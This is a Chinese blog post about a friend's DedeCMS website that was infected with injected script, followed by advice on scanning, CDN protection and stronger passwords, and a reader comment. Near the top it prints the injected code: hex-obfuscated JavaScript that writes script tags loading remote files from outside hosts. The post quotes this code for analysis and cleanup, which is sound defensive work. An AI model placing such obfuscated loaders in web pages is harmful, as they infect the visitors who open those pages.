今天一个朋友的网站被挂马,病毒源如下:
- <script language="javascript">
- window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x67\x67\x39\x39\x39\x2e\x35\x31\x36\x36\x2e\x69\x6e\x66\x6f\/\x67\x67\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
- </script>
- <script language="javascript">
- window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x75\x73\x65\x72\x73\x33\x2e\x6a\x61\x62\x72\x79\x2e\x63\x6f\x6d\/\x67\x67\x69\x6e\x66\x6f\/\x69\x6e\x66\x6f\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
- </script>
这是一段通过16进制编码的 JavaScript病毒,当你打开含有这段代码的页面时,那你的电脑立马中毒,好狠啊!
我把这代码通过 JavaScript 以下方法来解析一直,看下明文究竟是什么?
<script>
var str= "window[" + "\x64\x6f\x63\x75\x6d\x65\x6e\x74"+"]["+" \x77\x72\x69\x74\x65"+"]("+"\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x67\x67\x39\x39\x39\x2e\x35\x31\x36\x36\x2e\x69\x6e\x66\x6f\/\x67\x67\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e";
alert(str);
</script>
结果如下:
我朋友程序用的是织梦dedecms做的网站,空间用的是:虚拟主机.香港空间。虽然说他曾经删除了这一段代码,但过一段时间,代码又会生成。说明网站还存在着后门的,并没有找到真正的病毒所在位置。
之所以出现这个问题,主要有以下几个原因:
1、服务商本身的问题。
2、网站程序漏洞太多。
3、账号密码过于简单,权限被人所掌控了。
解决办法:
一、检测、扫描网站
既然网站被挂马,网站存在病毒,我们首先要做的就是做一个网站检测,漏洞扫描......等,好知道哪些文件存在病毒?
推荐几个网站在线检测,在线扫描地址:
1、百度云观测:http://ce.baidu.com/
2、百度云扫描:https://sao.baidu.com/
3、360网站安全检测:http://webscan.360.cn/
4、第三方病毒扫描软件:https://www.fujieace.com/web/safety/virus.html
二、CDN防御
建议所有的网站都可以做一个CDN加速,CDN的作用不仅仅只是提升网站的速度,CDN它还可以隐藏自己网站真实IP;
防止一些:网页后门攻击、sql注入、信息泄露攻击、协议异常攻击、文件包含攻击、其它APP攻击、cc攻击、Ddos攻击......等等。
由于现在CDN平台很多,我就推荐我用过的两个CDN地址:
1、百度云加速:https://su.baidu.com/
2、360网站卫士:http://wangzhan.360.com/
3、cloudflare CDN:https://www.cloudflare.com/
三、密码提升
很多时候,网站被挂马是因为你的密码过于简单,别人破解了你的密码,拥有了你网站的权限。
如果你的网站没有被提权,是很难修改你的网页文件的。
密码一般这2个地方需要注意:
1、服务器或虚拟主机密码
2、网站后台密码
建议以上这两种地方,密码一定要非常的复杂,不要怕输入麻烦。我见过太多的人用dedecms后台的密码是:admin123类似的这种最常见的密码。
注意:由于近几年云服务器的提升,建议大家用云服务器,云服务器除了你拥有最大的权限之外,而且它的安全性相对来说还是很高的。
上面所说的方法只是教大家如何去排查?如何防御?
推荐查看:
网站有病毒怎么解决?:https://www.fujieace.com/web/safety/virus.html
如果你的网站受到攻击、挂马......病毒等,欢迎随时可以联系我!可以给出良好的解决方案。
2017年12月13日 20:48:08 沙发
我也遇到了这个问题,我按照你的方法,360没有检测出来,但是我用百度云扫描的时候,出现在好多的漏洞:高危有10个,中危12个,低危4个。漏洞等级包括:代码执行、CSRF、权限提升/绕过、DOS攻击、信息泄露。如下图: